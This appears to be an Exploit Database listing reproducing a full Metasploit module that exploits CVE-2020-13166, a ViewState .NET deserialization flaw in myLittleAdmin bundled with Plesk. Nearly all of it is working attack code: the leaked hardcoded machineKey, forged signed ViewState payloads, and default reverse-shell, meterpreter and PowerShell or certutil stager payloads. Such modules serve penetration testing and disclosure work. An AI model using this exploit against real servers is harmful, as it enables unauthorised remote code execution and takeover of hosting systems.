Plesk/myLittleAdmin – ViewState .NET Deserialization (Metasploit)

• Exploit Database
• 120 阅读

• 作者： Metasploit
  日期： 2020-05-25
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48513/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote   Rank = ExcellentRanking   # <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> VIEWSTATE_GENERATOR = 'CA0B0334'.freeze   # <machineKey # validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF" # decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4" # validation="SHA1" /> VIEWSTATE_VALIDATION_KEY = "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \ "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \ "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \ "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::ViewState include Msf::Exploit::CmdStager include Msf::Exploit::Powershell   def initialize(info = {}) super( update_info( info, 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization', 'Description' => %q{ This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded <machineKey> parameters in the web.config file for ASP.NET.   Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup.   Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account."   Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. }, 'Author' => [ # Reported to SSD (SecuriTeam) by an anonymous researcher # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam) 'Spencer McIntyre', # Inspiration 'wvu' # Module ], 'References' => [ ['CVE', '2020-13166'], ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'], ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw'] ], 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Windows Command', 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } ], [ 'Windows Dropper', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } ], [ 'PowerShell Stager', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } ] ], 'DefaultTarget' => 2, 'DefaultOptions' => { 'SSL' => true, 'WfsDelay' => 10 # First exploit attempt may be a little slow }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) )   register_options([ Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'), OptString.new('TARGETURI', [true, 'Base path', '/']) ])   # XXX: https://github.com/rapid7/metasploit-framework/issues/12963 import_target_defaults end   def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) )   unless res return CheckCode::Unknown('Target did not respond to check request.') end   unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server') return CheckCode::Unknown('Target is not running myLittleAdmin.') end   vprint_good("myLittleAdmin is running at #{full_uri}") check_viewstate(res.get_html_document) end   def check_viewstate(html) viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text   unless viewstate return CheckCode::Detected("__VIEWSTATE not found, can't complete check.") end   @viewstate_generator = html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text   unless @viewstate_generator print_warning('__VIEWSTATEGENERATOR not found, using known default value') @viewstate_generator = VIEWSTATE_GENERATOR end   # ViewState generator needs to be a packed integer now @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')   we_can_sign_viewstate = can_sign_viewstate?( viewstate, extra: @viewstate_generator, key: VIEWSTATE_VALIDATION_KEY )   if we_can_sign_viewstate return CheckCode::Vulnerable('We can sign our own ViewState.') end   CheckCode::Safe("We can't sign our own ViewState.") end   def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super   print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")   case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end   def execute_command(cmd, _opts = {}) vprint_status("Serializing command: #{cmd}")   res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { # This is the only parameter we need for successful exploitation! '__VIEWSTATE' => generate_viewstate_payload( cmd, extra: @viewstate_generator, key: VIEWSTATE_VALIDATION_KEY ) } )   unless res && res.code == 302 && res.redirection.path == '/error/index.html' fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}") end   print_good("Successfully executed command: #{cmd}") end   end